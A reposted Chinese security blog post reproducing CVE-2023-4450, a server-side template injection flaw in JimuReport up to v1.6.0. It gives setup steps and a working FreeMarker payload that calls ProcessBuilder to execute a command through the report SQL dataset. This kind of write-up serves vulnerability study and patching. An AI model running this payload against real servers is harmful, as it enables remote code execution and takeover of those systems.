CVE-2023-4450 RCE漏洞(附EXP)

admin 2024年9月28日12:22:10评论129 views字数 793阅读2分38秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把阿无安全设为星标”,否则可能看不到了

0x01 前言

    jeecgboot积木报表系统jimureport(jmreport)是一款免费的数据可视化报表,含报表和大屏设计,像搭建积木一样在线设计报表!功能涵盖数据报表、打印设计、图表报表、大屏设计等

CVE-2023-4450 RCE漏洞(附EXP)jimureport ≤ v1.6.0 具有 SSTI(服务器端模板注入),攻击者可利用该漏洞远程执行任意代码,控制服务器权限

0x02 漏洞影响

jimureportv1.6.0 

0x03 环境搭建

环境要求:jdk+,MySQL

文本所需环境已打包好,文末自行获取即可

jimureport.mysql5.7.create.sql文件导入数据库

CVE-2023-4450 RCE漏洞(附EXP)

修改配置文件application.yml(默认root/root)

CVE-2023-4450 RCE漏洞(附EXP)

运行bat文件,启动环境

CVE-2023-4450 RCE漏洞(附EXP)

环境启动成功!

CVE-2023-4450 RCE漏洞(附EXP)

访问地址:http://localhost:8085/jmreport/list

CVE-2023-4450 RCE漏洞(附EXP)

0x04 漏洞复现

新建图表

CVE-2023-4450 RCE漏洞(附EXP)

选择SQL数据集

CVE-2023-4450 RCE漏洞(附EXP)

EXP:

<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc").start ()}

在报表SQL中执行该PAYLOAD

CVE-2023-4450 RCE漏洞(附EXP)

命令执行成功!

CVE-2023-4450 RCE漏洞(附EXP)

0x05 修复方案

建议及时更新版本!

0x06 下载地址

点击下方名片进入公众号

回复关键字【20234450】获取下载链接

 CVE-2023-4450 RCE漏洞(附EXP)

原文始发于微信公众号(EchoSec):CVE-2023-4450 RCE漏洞(附EXP)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日12:22:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-4450 RCE漏洞(附EXP)https://cn-sec.com/archives/1989626.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息